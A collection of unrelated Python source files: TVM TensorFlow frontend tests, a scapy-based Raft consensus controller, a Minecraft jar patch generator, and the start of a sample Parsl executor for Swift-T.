op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
# tensorflow version upgrade support
# This test is expected to fail in TF version >= 2.6
# as the generated graph will be considered frozen, hence
# not passing the criteria for the test below.
if tf.__version__ < LooseVersion("2.6.1"):
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynmaic_rnn_lstmblockcell():
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(np_data, "", ["Unique:0", "Unique:1"], mode="vm")
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
np_data,
"",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
#######################################################################
# check graph ir for nn.moments
# ------------
def test_moments():
g = tf.Graph()
shape = [4, 176, 8, 8]
dtype = "float32"
with g.as_default():
A = tf.placeholder(shape=shape, dtype=dtype, name="A")
B = tf.placeholder(shape=shape, dtype=dtype, name="B")
mean, variance = tf.nn.moments(A, [1], keep_dims=True)
normalised_input = (A - mean) / tf.sqrt(variance + 0.0005)
mod, _ = from_tensorflow(g.as_graph_def(add_shapes=True))
program = """
def @main(%A: Tensor[(4, 176, 8, 8), float32]) {
%527 = mean(%A, axis=[1], keepdims=True) /* moments/mean */;
%528 = subtract(%A, %527) /* sub */;
%529 = subtract(%A, %527);
%530 = multiply(%529, %529) /* moments/SquaredDifference */;
%531 = mean(%530, axis=[1], keepdims=True) /* moments/variance */;
%532 = add(%531, 0.0005f) /* add */;
%533 = sqrt(%532) /* Sqrt */;
divide(%528, %533) /* truediv */
}
"""
mod_golden = tvm.parser.parse('#[version = "0.0.5"]\n' + program)
tvm.ir.assert_structural_equal(mod["main"].body, mod_golden["main"].body, map_free_vars=True)
#######################################################################
# invert_permutation
# --------------------
def test_invert_permutation():
"""test InvertPermutation"""
tf.reset_default_graph()
input_shape = [6]
x = np.array([3, 4, 0, 2, 1, 5]).astype("int32")
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype="int32")
tf.invert_permutation(in_data)
out_name = "InvertPermutation:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, no_gpu=False)
if __name__ == "__main__":
pytest.main([__file__])
|
Controller.py
|
from scapy.all import *
from packet_sender import Raft, send_no_reply, COMMANDS
from threading import Event
from utils.Switch_Register_Manager import CustomConsole
from timeit import default_timer as timer
import argparse
RANDOM_TIMEOUT = {'min': 150, 'max': 300} # min max values in ms
RAFT_HEARTBEAT_RATE = 50
STATUSES = {'follower': 0, 'candidate': 1, 'leader': 2}
RAFT_PROTOCOL_DSTPORT = 0x9998
IP_MULTICAST_ADDRESS = '224.0.255.255'
#logging_format = '%(asctime)-15s [%(threadName)s] - [%(funcName)s] %(message)s'
logging_format = ''
level = logging.ERROR # Change to Error or something like that to silence the log to file!
logging.basicConfig(filename='./logs/controller.log', level=level, format=logging_format)
logger = logging.getLogger()
class Controller(object):
def __init__(self, controller_ip):
self.status = STATUSES['follower']
self.timeout_thread = None
self.controller_ip = controller_ip
self.nodeID = args.ID # the controllee raft node
self.term = 0
self.logIndex = 0
self.counter_new_request = 0
self.counter_rejected_requests = 0
self.sniffer = AsyncSniffer(
iface=conf.iface,
lfilter=is_ingoing_raft_packet,
prn=lambda _pkt: self.handle_packet(_pkt)
)
self.sniffer.start()
self.heartbeat_loop_thread = threading.Thread(target=self.heartbeats_loop)
self.heartbeat_loop_thread.start()
self.time = None
self.stop_flag = Event()
if self.nodeID == 1:
self.failure_thread = threading.Thread(target=self.emulate_failure)
self.failure_thread.start()
self.init_timeout() # starting as follower, we need to start the timeout
def handle_packet(self, packet):
if packet[Raft].messageType == COMMANDS['RequestVote'] and packet[Raft].sourceID == self.nodeID:
self.status = STATUSES['candidate']
self.time = timer()
print('vote request: -> state: {};'.format(self.status))
if packet[Raft].messageType == COMMANDS['HeartBeatRequest'] and packet[Raft].sourceID == self.nodeID: # received the heartbeat from node -> node has won the election
if self.status == STATUSES['candidate']:
print('won election -> status = leader')
print('time elapsed (in ms): {}'.format((timer() - self.time)*1000))
logger.debug('[nodeID: {}] won election: {}'.format(self.nodeID, timer()))
print('election absolute time: {}'.format(timer()))
self.status = STATUSES['leader']
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
if packet[Raft].messageType == COMMANDS['HeartBeatRequest'] and not packet[Raft].sourceID == self.nodeID:
self.status = STATUSES['follower']
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
self.init_timeout()
if packet[Raft].messageType == COMMANDS['HeartBeatResponse']: # received a cloned heartbeat response from node -> reset timeout
#print('resetting timeout; response to destinationID: {}'.format(packet[Raft].destinationID))
#print('state : {}'.format(self.status))
self.term = packet[Raft].currentTerm
if self.status == STATUSES['leader']:
print('stepping down as leader.')
self.status = STATUSES['follower']
self.init_timeout()
if packet[Raft].messageType == COMMANDS['AppendEntriesReply']: # received a cloned AppendEntries response from node -> reset timeout
#print('resetting timeout; AppendEntries from: {}'.format(packet[Raft].destinationID))
#print('state : {}'.format(self.status))
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
self.init_timeout()
# if packet[Raft].messageType == COMMANDS['AppendEntries']:
# print('starting Transaction: {}'.format(time.time()))
if packet[Raft].messageType == COMMANDS['Redirect'] and self.status == STATUSES['leader']:
# received a redirected New Request from a client
# new request can be made only by controllers
self.counter_new_request += 1
packet[Raft].messageType = COMMANDS['NewRequest']
logger.debug('[nodeID: {}] redirected New Request received; total: {}; time: {}'.format(
self.nodeID,
self.counter_new_request,
timer())
)
#print('New Request received; total: {}; time: {}'.format(self.counter_new_request, time.time()))
packet[Raft].sourceID = 0x0
packet[Raft].destinationID = self.nodeID
packet[IP].srcAddr = args.source
#packet[Raft].show()
send_no_reply(packet)
#if (self.counter_new_request % 1000 == 0) and self.nodeID == 1: # emulating failure self.sniffer.start():
#self.emulate_failure()
if packet[Raft].messageType == COMMANDS['RejectNewRequest']:
self.counter_rejected_requests += 1
logger.debug('[nodeID: {}] New request rejected; total {}'.format(self.nodeID, self.counter_rejected_requests))
#print('New request rejected; total {}'.format(self.counter_rejected_requests))
#print('state : {}'.format(self.status))
# if packet[Raft].messageType == COMMANDS['CommitValue']:
# print('Transaction complete. time: {}'.format(time.time()))
#print('send confirmation to Client')
# if packet[Raft].messageType == COMMANDS['RetrieveLog']:
# print('retrieved value: {} at index: {}'.format(packet[Raft].data, packet[Raft].logIndex))
#logger.debug(packet.sprintf())
#packet[Raft].show()
def emulate_failure(self):
#cmd = CustomConsole(9090)
time.sleep(10)
#cmd.communicate("register_write roleRegister 0 0")
logger.debug('[nodeID: {}] failure time: {}'.format(self.nodeID, timer()))
print('failure time: {}'.format(timer()))
self.sniffer.stop(join=False)
self.stop_flag.set()
time.sleep(5)
self.sniffer.start()
self.stop_flag.clear()
# import os
# print('emulating failure after {} New Req>
# os._exit(0)
def raft_timeout(self):
return random.randrange(RANDOM_TIMEOUT['min'], RANDOM_TIMEOUT['max']) / 1000
def reset_timeout(self):
self.election_time = time.time() + self.raft_timeout()
def init_timeout(self):
self.reset_timeout()
# safety guarantee, timeout thread may expire after election
if self.timeout_thread and self.timeout_thread.is_alive():
return
self.timeout_thread = threading.Thread(target=self.timeout_loop)
self.timeout_thread.start()
def heartbeats_loop(self):
rate = RAFT_HEARTBEAT_RATE / 1000
while True: # todo find a way to block this thread in a more clever way
if self.status == STATUSES['leader'] and not self.stop_flag.is_set():
#print('sending StartHeartbeat')
self.send_heartbeat_request()
time.sleep(rate)
else:
time.sleep(rate)
return
# the timeout function
def timeout_loop(self):
# only stop timeout thread when winning the election
while self.status != STATUSES['leader']:
delta = self.election_time - time.time()
if delta < 0:
self.start_election()
self.reset_timeout()
else:
time.sleep(delta)
return
def start_election(self):
print('starting election')
#logger.debug("{} starting election; status: {}, term:{}".format(self.controller_ip, self.status, self.term))
self.term += 1
start_election_message = Raft.raft_packet(
sourceID=0x0,
destinationID=self.nodeID,
data=0x0,
logIndex=self.logIndex,
srcIP=args.source,
dstIP=IP_MULTICAST_ADDRESS,
currentTerm=self.term,
messageType=COMMANDS['Timeout']
)
send_no_reply(start_election_message)
def send_heartbeat_request(self):
#print("Sending heartbeat request")
#logger.debug("Starting HEARTBEATS")
heartbeat = Raft.raft_packet(
sourceID=0x0,
destinationID=self.nodeID,
data=0x0,
logIndex=self.logIndex,
srcIP=args.source,
dstIP=IP_MULTICAST_ADDRESS,
currentTerm=self.term,
messageType=COMMANDS['StartHeartbeat']
)
send_no_reply(heartbeat)
# def main_handle_packet(packet):
# packet[Raft].show()
def is_ingoing_raft_packet(_packet):
if _packet.haslayer(IP):
if not _packet[IP].proto == 'icmp':
if _packet.haslayer(UDP):
if _packet[UDP].dport == RAFT_PROTOCOL_DSTPORT:
if _packet.haslayer(Raft):
#return True
if _packet[Raft].sourceID != 0x0:
return True
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Raft Packet Sender')
parser.add_argument(
'-s', '--source', help='select the node IP (default=10.0.1.1)', default='10.0.1.1', required=False,
type=str
)
parser.add_argument(
'-i', '--ID', help='ID of raft node', default='1', required=False,
type=int
)
args = parser.parse_args()
controller = Controller(args.source)
print('starting controller')
while True: # useless, only to keep the main thread alive
time.sleep(10)
|
patchgen.py
|
#!/usr/bin/env python
# vim: noet
# ---------------------------------------------------------------------------
# Copyright (C) 2013 Andrew Okin
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ---------------------------------------------------------------------------
# Future
from __future__ import print_function, unicode_literals, absolute_import
# IMPORTS
import json
import md5
import re
import urllib2
import requests
from urlparse import urljoin
import argparse
import os
import sys
import shutil
from Queue import Queue
from threading import Thread
import bsdiff4
#####################
# UTILITY FUNCTIONS #
#####################
def determine_latest_version(mojang_versions_url):
"""Reads from Mojang's version list and returns the name of the latest version of Minecraft."""
response = urllib2.urlopen(urljoin(mojang_versions_url, "versions.json"))
json_str = response.read()
data = json.loads(json_str)
return data["latest"]["release"]
def is_valid_md5(md5str):
return len(md5str) == 32 and re.findall(r"[a-fA-F\d]", md5str)
def get_index_mcversion(index_path):
"""
read the minecraft version from the index file.
return <index mcversion or None>
"""
if os.path.exists(index_path):
index = json.load(open(index_path, "r"))
return index["mcversion"]
return None
def download_version(mojang_versions_url, mcversion, dest, max_tries = 3):
"""Downloads the jar file with the given version number from Mojang's download site to the given output file."""
pass
def generate_patch(version, old_jar, patch, latest_jar):
"""
Generates a diff between latest_jar and old_jar in patch
"""
bsdiff4.file_diff(latest_jar, old_jar, patch)
result = {"name": version}
with open(old_jar, "rb") as fp:
result["md5"] = md5.new(fp.read()).hexdigest()
return result
#########
# TASKS #
#########
def check_new_jars(jar_dir_path, cache_file_path, mojang_versions_url, verbose = False):
"""
Checks to see if a new jar file should be downloaded.
If verbose is true, the function will print a bunch of crap about what's going on. Primarily reasons why it has determined that there's a new version.
Returns the version name of the new jar if there is one. Otherwise, return an empty string.
"""
# This is probably a monstrosity, but I don't want to have to type this crap out 20 times...
def print_new_version_reason(msg):
print("Assuming there's a new version because %s" % msg)
# First, get the version name of the latest minecraft.jar
latest_version_name = determine_latest_version(mojang_versions_url)
# Next, we need to make sure the cache file exists. If it doesn't, assume there's a new version.
if not os.path.exists(cache_file_path):
if verbose: print_new_version_reason("the cache file doesn't exist.")
return latest_version_name
# Now we load the cache file.
cache_info = {}
with open(cache_file_path, "r") as cahce_file: cache_info = json.load(cahce_file) # TODO: Handle syntax errors
# Ensure the cache is valid.
if not "mcversion" in cache_info or not "md5sum" in cache_info:
if verbose: print_new_version_reason("the cache file is missing fields.")
return latest_version_name
# Make sure the cache file's mcversion name matches the latest version name.
if cache_info["mcversion"] != latest_version_name:
if verbose: print_new_version_reason("the mcversion specified in the cache file doesn't match the latest version.")
return latest_version_name
# Determine the path to the latest jar
latest_jar_path = os.path.join(jar_dir_path, latest_version_name + ".jar")
# Make sure we have a jar file in our jars folder matching this version name.
if not os.path.exists(latest_jar_path):
if verbose: print_new_version_reason("no jar file found matching the mcversion specified in the cache file.")
return latest_version_name
# Get the ETag for the latest jar file.
req = requests.head(mojang_versions_url + "{0}/{0}.jar".format(latest_version_name))
req.raise_for_status()
etag = req.headers['ETag'][1:-1]
# Make sure the ETag is a valid MD5sum. If not, error.
if not is_valid_md5(etag):
print("ETag %s is not a valid MD5sum. Aborting!" % etag)
if verbose: print_new_version_reason("the ETag received from the version list is not a valid MD5sum.")
return "" # TODO: Should return an error here.
# Check if the ETag matches the MD5sum field in the cache file.
if etag != cache_info["md5sum"]:
if verbose: print_new_version_reason("the ETag on the version list (%s) doesn't match the one in the cache file (%s)." %
(etag, cache_info["md5sum"]))
return latest_version_name
# Next we calculate the MD5sum of the already downloaded file in our jars folder and make sure it matches too.
jar_md5 = md5.new()
with open(latest_jar_path, "rb") as jar: jar_md5.update(jar.read())
if etag != jar_md5.hexdigest():
if verbose: print_new_version_reason("the MD5sum of the jar file doesn't match the ETag or the one in the cache file.")
return latest_version_name
# Now that all of these checks have passed, we can be almost absolutely sure that the version we have in the jars folder is actually the version we want. Return empty string, indicating that we don't need to download anything.
return ""
def download_latest_jar(latest_version_name, cache_file_path, mojang_versions_url,
dest, max_tries = 3, show_progress_indicator = False):
"""
Downloads the latest minecraft.jar from Mojang's version list site and writes info about it to the cache file.
latest_version_name specifies the version name for the minecraft.jar that should be downloaded as the latest version.
returns < 0 if successful, otherwise positive number > 1
"""
try_count = 0
jar_md5 = None
# First, download the file and make sure it's valid.
while try_count < max_tries:
# Open URL and file streams for reading / writing.
response = urllib2.urlopen(urljoin(mojang_versions_url, "{0}/{0}.jar".format(latest_version_name)))
outfile = open(dest, "wb")
# Get header info.
info = response.info()
# Get the ETag field from the header.
etag = (info.getheaders("ETag")[0])[1:-1]
size = int(info.getheaders("Content-Length")[0])
print("Downloading %i bytes" % size)
# Ensure that the etag is a valid MD5
if not is_valid_md5(etag):
print("ETag %s is not a valid MD5. Aborting!" % etag)
return 1
# Create a new MD5 object for the data we're downloading.
md5obj = md5.new()
# Download data and pass it to the MD5 object as we download it.
downloaded = 0
block_sz = 8192
while True:
buf = response.read(block_sz)
if not buf:
break
downloaded += len(buf)
outfile.write(buf)
md5obj.update(buf)
# Show a progress indicator if it's enabled.
if show_progress_indicator:
pcnt = int((float(downloaded) / float(size)) * 100)
print("\rDownloading jar file - %3d%% [%7d/%7d bytes]" % (pcnt, downloaded, size), end="")
sys.stdout.write("\n")
sys.stdout.flush()
outfile.close()
jar_md5 = md5obj.hexdigest()
if jar_md5 == etag:
# If the download succeeded, break the loop.
break
elif try_count < max_tries:
# Otherwise, print a warning and continue.
print("MD5 of downloaded data (%s) did not match the ETag (%s). Trying again." % (jar_md5, etag))
continue
else:
# If we've tried too many times, give up.
print("MD5 of downloaded data (%s) did not match the ETag (%s). Giving up after %d tries." % (digest, etag, try_count))
return 1
# Now that we've downloaded the file, we need to store the information in the cache file.
# Luckily, Python is fucking awesome.
with open(cache_file_path, "w") as cache_file:
json.dump({ "mcversion": latest_version_name, "md5sum": jar_md5 }, cache_file)
return 0
def generate_patches(worker_threads, jar_dir_path, output_dir_path, index_file_name, latest_mc_version):
"""
Generates patches.
worker_threads specifies how many bsdiff threads to run at once.
latest_mc_version specifies the version name of the latest Minecraft version.
returns < 0 if successful, otherwise positive number > 1
"""
if not os.path.exists(jar_dir_path):
print("No jars directory found at %s" % jar_dir_path)
return 2
if os.path.exists(output_dir_path):
shutil.rmtree(output_dir_path)
os.mkdir(output_dir_path)
index = {
"mcversion": latest_mc_version,
"versions": [],
"listversion": 1,
}
latest_jar_path = os.path.join(jar_dir_path, "%s.jar" % latest_mc_version)
# Load all the patches into a queue.
patch_queue = Queue()
for jarfile in os.listdir(jar_dir_path):
fname, ext = os.path.splitext(os.path.basename(jarfile))
if ext != ".jar":
print("Skipping %s because it doesn't look like a jar file." % jarfile)
continue
patch_queue.put(os.path.join(jar_dir_path, jarfile))
# Thread function for patch generation workers.
def patchgen_worker():
while not patch_queue.empty():
jarfile = patch_queue.get()
fname, ext = os.path.splitext(os.path.basename(jarfile))
print("Generating patch for %s" % fname)
index["versions"].append(generate_patch(fname, jarfile,
os.path.join(output_dir_path, "%s.patch" % fname), latest_jar_path))
patch_queue.task_done()
for i in range(worker_threads):
t = Thread(target = patchgen_worker)
t.daemon = True
t.start()
patch_queue.join()
# Dump the index to output
print("Writing Index...")
with open(index_file_name, "w") as index_file:
json.dump(index, index_file)
return 0
def main(argv):
""" Main function """
parser = argparse.ArgumentParser(prog=argv[0], description="MCRewind patchserver generator")
parser.add_argument("-f", "--force", default=False, action="store_true",
help="Force patch generation")
parser.add_argument("-j", "--threads", default=1, type=int,
help="Anmount of worker threads [%(default)s]", metavar="T")
parser.add_argument("-a", "--mojang-versions", default="http://s3.amazonaws.com/Minecraft.Download/versions/",
help="The url to Mojang's versions.json", metavar="URL")
parser.add_argument("-n", "--offline", default=False, action="store_true",
help="Don't check for a new minecraft version (implies -f)")
parser.add_argument("-v", "--verbose", default=False, action="store_true",
help="Enables verbose output.")
p_dirs = parser.add_argument_group("Paths")
p_dirs.add_argument("-o", "--output-dir", default="patches",
help="The output directory [%(default)s]", metavar="DIR")
p_dirs.add_argument("-i", "--jar-dir", default="jars",
help="The directory containing the .jar files [%(default)s]", metavar="DIR")
p_dirs.add_argument("-x", "--index-file", default="index.json",
help="Path specifying where the index file should be generated [%(default)s]", metavar="INDEX")
p_dirs.add_argument("-c", "--cache-file", default="cache.json",
help="Path specifying where the cache file should be put [%(default)s]", metavar="CACHE")
args = parser.parse_args(argv[1:])
print("MCRewind Patch Generator v1")
print("Force generate patches? %s" % str(args.force))
print("Worker Threads: %i" % args.threads)
print("Mojang versions URL: %s" % args.mojang_versions)
print("Offline mode? %s" % str(args.offline))
print("Jar file directory: %s" % args.jar_dir)
print("Output directory: %s" % args.output_dir)
print("Index file path: %s" % args.index_file)
print("Cache file path: %s" % args.cache_file)
print("")
mcversion = get_index_mcversion(args.index_file)
new_version = None
if not args.offline:
print("Checking for a new minecraft version...")
# Call check_new_jars to see if there's a new version.
new_version = check_new_jars(args.jar_dir, args.cache_file, args.mojang_versions,
verbose = args.verbose)
# If there's a new version.
if new_version:
print("Found new Minecraft version: %s" % new_version)
# Download the new version.
dest = os.path.join(args.jar_dir, "%s.jar" % new_version)
retval = download_latest_jar(new_version, args.cache_file, args.mojang_versions, dest,
show_progress_indicator = True)
if retval > 0:
print("Error getting latest jar. Aborting.")
return retval
# _, new_version = check_new_version(mcversion, args.mojang_versions)
# if new_version:
# print("New Minecraft version found: %s" % new_version)
# dest = os.path.join(args.jar_dir, "%s.jar" % new_version)
# if os.path.exists(dest):
# print("Found new version in JAR directory.")
# else:
# download_version(args.mojang_versions, new_version, dest)
else:
print("Skipping update check.")
if not (new_version or args.force or args.offline):
print("No new version found, not doing anything.")
return 0
# Yes, this else is unnecessary, but it makes it easier to tell what's going on here.
else:
if not mcversion and not new_version:
print("Can't generate patches because no cache or index file could be found.")
return 1
print("Generating patches...")
result = generate_patches(args.threads, args.jar_dir, args.output_dir,
args.index_file, (new_version if new_version else mcversion))
if result != 0:
return result
print("Done.")
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
swift_t.py
|
"""Sample Executor for integration with SwiftT.
This follows the model used by `EMEWS <http://www.mcs.anl.gov/~wozniak/papers/Cancer2_2016.pdf>`_
to some extent.
"""
from concurrent.futures import Future
import logging
import uuid
import threading
import queue
import multiprocessing as mp
from ipyparallel.serialize import pack_apply_message, unpack_apply_message
from ipyparallel.serialize import serialize_object, deserialize_object
from parsl.executors.base import ParslExecutor
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
def runner(incoming_q, outgoing_q):
"""This is a function that mocks the Swift-T side.
It listens on the the incoming_q for tasks and posts returns on the outgoing_q.
Args:
- incoming_q (Queue object) : The queue to listen on
- outgoing_q (Queue object) : Queue to post results on
The messages posted on the incoming_q will be of the form :
.. code:: python
{
"task_id" : <uuid.uuid4 string>,
"buffer" : serialized buffer containing the fn, args and kwargs
}
If ``None`` is received, the runner will exit.
Response messages should be of the form:
.. code:: python
{
"task_id" : <uuid.uuid4 string>,
"result" : serialized buffer containing result
"exception" : serialized exception object
}
On exiting the runner will post ``None`` to the outgoing_q
"""
logger.debug("[RUNNER] Starting")
def execute_task(bufs):
"""Deserialize the buffer and execute the task.
Returns the serialized result or exception.
"""
user_ns = locals()
user_ns.update({'__builtins__': __builtins__})
f, args, kwargs = unpack_apply_message(bufs, user_ns, copy=False)
fname = getattr(f, '__name__', 'f')
prefix = "parsl_"
fname = prefix + "f"
argname = prefix + "args"
kwargname = prefix + "kwargs"
resultname = prefix + "result"
user_ns.update({fname: f,
argname: args,
kwargname: kwargs,
resultname: resultname})
code = "{0} = {1}(*{2}, **{3})".format(resultname, fname,
argname, kwargname)
try:
logger.debug("[RUNNER] Executing: {0}".format(code))
exec(code, user_ns, user_ns)
except Exception as e:
logger.warning("Caught exception; will raise it: {}".format(e))
raise e
else:
logger.debug("[RUNNER] Result: {0}".format(user_ns.get(resultname)))
return user_ns.get(resultname)
while True:
try:
# Blocking wait on the queue
msg = incoming_q.get(block=True, timeout=10)
except queue.Empty:
# Handle case where no items were in the queue
logger.debug("[RUNNER] Queue is empty")
except IOError as e:
logger.debug("[RUNNER] Broken pipe: {}".format(e))
try:
# Attempt to send a stop notification to the management thread
outgoing_q.put(None)
except Exception:
pass
break
except Exception as e:
logger.debug("[RUNNER] Caught unknown exception: {}".format(e))
else:
# Handle received message
if not msg:
# Empty message is a die request
logger.debug("[RUNNER] Received exit request")
outgoing_q.put(None)
break
else:
# Received a valid message, handle it
logger.debug("[RUNNER] Got a valid task with ID {}".format(msg["task_id"]))
try:
response_obj = execute_task(msg['buffer'])
response = {"task_id": msg["task_id"],
"result": serialize_object(response_obj)}
logger.debug("[RUNNER] Returing result: {}".format(
deserialize_object(response["result"])))
except Exception as e:
logger.debug("[RUNNER] Caught task exception: {}".format(e))
response = {"task_id": msg["task_id"],
